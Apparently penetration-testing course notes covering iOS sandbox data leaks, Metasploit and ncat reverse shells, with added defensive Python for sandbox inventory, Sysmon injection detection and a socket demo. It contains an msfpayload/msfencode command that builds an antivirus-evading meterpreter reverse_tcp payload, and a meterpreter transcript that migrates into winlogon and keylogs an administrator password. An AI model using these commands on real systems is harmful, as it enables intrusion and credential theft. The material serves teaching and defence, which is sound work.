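Most of the entry points in that list are files inside the app's sandbox, and an assessor walks through them the same way every time. As an added example (not from the course material), the Python below builds a constructed sandbox with a plist, an SQLite database, a snapshot image, a temporary file and an error log, then inventories where personal or secret data ends up: plist keys and SQLite columns that look like credentials or coordinates, snapshot images, temp files, and log lines that carry secrets. The directory names are modelled on the iOS layout, the file names and contents are invented, and the secret and geolocation patterns are simple assumptions a real review would tune.

```python
import plistlib
import re
import sqlite3
import tempfile
from pathlib import Path

# Heuristics for the review; deliberately simple and documented as assumptions.
SECRET = re.compile(r"(pass|pwd|secret|token|session)", re.I)
GEO = re.compile(r"(^|_)(lat|lon|latitude|longitude)(_|$)", re.I)


def build_sample_sandbox(root):
    """Create a constructed app sandbox with the artefact types listed above."""
    root = Path(root)
    (root / "Library/Preferences").mkdir(parents=True)
    (root / "Library/Caches/Snapshots").mkdir(parents=True)
    (root / "Documents").mkdir()
    (root / "tmp").mkdir()
    with open(root / "Library/Preferences/com.example.app.plist", "wb") as fh:
        plistlib.dump({"username": "alice", "auth_token": "tok-constructed-123",
                       "last_lat": 51.5}, fh)
    db = sqlite3.connect(root / "Documents/app.sqlite")
    db.execute("CREATE TABLE accounts (id INTEGER, login TEXT, password TEXT)")
    db.execute("CREATE TABLE places (id INTEGER, lat REAL, lon REAL)")
    db.commit()
    db.close()
    (root / "Library/Caches/Snapshots/UIApplicationAutomaticSnapshotDefault-Portrait.png"
     ).write_bytes(b"\x89PNG constructed placeholder")
    (root / "tmp/upload.tmp").write_text("scratch data")
    (root / "Documents/error.log").write_text("login failed for alice password=hunter2\n")


def inventory_sandbox(root):
    """Return (category, location) findings for every sensitive-data entry point found."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_dir():
            continue
        rel = path.relative_to(root).as_posix()
        if path.suffix == ".plist":
            with open(path, "rb") as fh:
                data = plistlib.load(fh)
            for key in data:
                if SECRET.search(key):
                    findings.append(("secret-in-plist", f"{rel}:{key}"))
                elif GEO.search(key):
                    findings.append(("geolocation", f"{rel}:{key}"))
        elif path.suffix in (".sqlite", ".sqlite3", ".db"):
            db = sqlite3.connect(path)
            tables = [r[0] for r in db.execute("SELECT name FROM sqlite_master WHERE type='table'")]
            for table in tables:
                for col in db.execute(f'PRAGMA table_info("{table}")'):
                    name = col[1]  # column name
                    if SECRET.search(name):
                        findings.append(("secret-in-sqlite", f"{rel}:{table}.{name}"))
                    elif GEO.search(name):
                        findings.append(("geolocation", f"{rel}:{table}.{name}"))
            db.close()
        elif "Snapshots" in path.parts and path.suffix == ".png":
            findings.append(("snapshot", rel))  # may contain the last screen shown
        elif rel.startswith("tmp/"):
            findings.append(("temp-file", rel))
        elif path.suffix == ".log":
            for n, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
                if SECRET.search(line):
                    findings.append(("secret-in-log", f"{rel}:{n}"))
    return findings


def demo():
    """Build the constructed sandbox in a temp dir and inventory it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_sandbox(tmp)
        return inventory_sandbox(tmp)


if __name__ == "__main__":
    for category, where in demo():
        print(f"{category:18} {where}")
```

Each category maps to a mitigation: secrets belong in the keychain rather than plists, databases or logs; snapshot storage is blanked by covering the window when the app goes to the background; temporary files are cleared on launch; coordinates are stored only while the feature needs them.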
Further information about URL Schemes security can be found here:
http://software-security.sans.org/blog/2010/11/08/insecure-handling-url-schemes-apples-ios/
OWASP Mobile Top 10

Note for AV testing during PT:
msfpayload can be piped through the msfencode tool to further encode the binaries created and attempt to avoid
antivirus detection.
msfpayload windows/meterpreter/reverse_tcp LHOST={YOUR_IP} LPORT={PORT} R | msfencode -e x86/countdown -c 2 -t raw | msfencode -t exe -e x86/shikata_ga_nai -c 3 -k -o /root/backdoors/encoded-payload.exe
Furthermore, Metasploit would allow you to 'migrate' to the winlogon process to capture system login information.
This will capture the credentials of all users logging into the system.

meterpreter > ps

Process list
============

 PID  Name          Path
 ---  ----          ----
 401  winlogon.exe  C:\WINNT\system32\winlogon.exe

meterpreter > migrate 401
[*] Migrating to 401...
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator Ch@ng3M30nLog1n!
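The migrate step in that transcript is what a defender can see: a thread created in, or a handle opened to, winlogon.exe by a process that has no business there. As an added example (not from the course material), the Python below applies that detection to constructed Sysmon-style records. The field names (EventID 8 CreateRemoteThread with SourceImage/TargetImage, EventID 10 ProcessAccess with GrantedAccess) follow the real Sysmon schema; the events themselves, the file paths and the allowlist of legitimate system processes are invented for the example and would be tuned per environment.

```python
# Processes whose memory or threads an ordinary application never touches;
# winlogon.exe is the one the meterpreter transcript migrates into.
PROTECTED_TARGETS = {"winlogon.exe", "lsass.exe", "csrss.exe", "services.exe"}

# Access-mask bits (Sysmon Event ID 10, GrantedAccess) that enable injection
# or memory reads: PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION,
# PROCESS_VM_READ, PROCESS_VM_WRITE.
INJECTION_BITS = 0x0002 | 0x0008 | 0x0010 | 0x0020

# Assumed allowlist of system binaries that legitimately open these processes.
ALLOWLISTED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Constructed Sysmon-style records; nothing here is captured from a real host.
SAMPLE_EVENTS = [
    {"EventID": 10,  # benign: PROCESS_QUERY_LIMITED_INFORMATION only
     "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\winlogon.exe",
     "GrantedAccess": "0x1000"},
    {"EventID": 8,   # remote thread injected into winlogon by a user-writable binary
     "SourceImage": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\System32\winlogon.exe"},
    {"EventID": 10,  # same binary opened winlogon with full access
     "SourceImage": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\System32\winlogon.exe",
     "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1,   # unrelated process creation, no TargetImage
     "Image": r"C:\Windows\System32\notepad.exe"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_process_injection(events):
    """Return (severity, reason) alerts for injection-style access to protected processes."""
    alerts = []
    for ev in events:
        target = basename(ev.get("TargetImage", ""))
        if target not in PROTECTED_TARGETS:
            continue
        source = ev.get("SourceImage", "")
        if source.lower() in ALLOWLISTED_SOURCES:
            continue
        if ev["EventID"] == 8:
            alerts.append(("high", f"remote thread created in {target} by {source}"))
        elif ev["EventID"] == 10:
            granted = int(ev.get("GrantedAccess", "0x0"), 16)
            if granted & INJECTION_BITS:
                alerts.append(("medium", f"{source} opened {target} with access 0x{granted:X}"))
    return alerts


if __name__ == "__main__":
    for severity, reason in detect_process_injection(SAMPLE_EVENTS):
        print(severity, reason)
```

The query-only handle from svchost is ignored while both events from the Temp-directory binary are raised, which is the shape of rule that catches a migrate into winlogon or lsass without paging on routine system activity.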

Perform a quick socket connection using ncat (an nmap installation deploys ncat) to demonstrate the concept and
the principle of a reverse shell for further exploitation.
Activity: approximately 10 minutes.
Computer a) ncat -l -vv -p 9999
Computer b) ncat <computer (a) IP address> <port> -vv
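For participants who want to see what the two ncat commands do under the hood, here is the same exchange written in Python as an added example (not part of the course material): one thread listens like computer (a), the main thread connects like computer (b), a line is sent and acknowledged. It exchanges a single message and does not attach a shell; the port is chosen by the OS so the script runs anywhere, where the activity fixes it at 9999.

```python
import socket
import threading


def run_listener(ready, result):
    """Computer (a): bind, listen, accept one connection, echo an acknowledgement."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("127.0.0.1", 0))  # port 0: OS picks a free port (ncat -l -p 9999 fixes it)
        srv.listen(1)
        result["port"] = srv.getsockname()[1]
        ready.set()  # tell the client which port to dial
        conn, peer = srv.accept()
        with conn:
            data = conn.recv(1024)
            result["received"] = data.decode()
            result["peer"] = peer
            conn.sendall(b"ack: " + data)


def exchange(message="hello from computer b"):
    """Computer (b): connect to the listener, send one line, return (what a got, what b got)."""
    ready = threading.Event()
    result = {}
    t = threading.Thread(target=run_listener, args=(ready, result), daemon=True)
    t.start()
    if not ready.wait(5):
        raise RuntimeError("listener did not start")
    with socket.create_connection(("127.0.0.1", result["port"]), timeout=5) as cli:
        cli.sendall(message.encode())
        reply = cli.recv(1024).decode()
    t.join(5)
    return result["received"], reply


if __name__ == "__main__":
    print(exchange())
```

The roles are the point of the exercise: the side that listens is the one whose firewall must admit an inbound connection, which is why an attacker prefers the victim to be the connecting side (a reverse shell) and why egress filtering and alerts on outbound connections to unusual high ports are the corresponding controls.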

Page for Note Taking
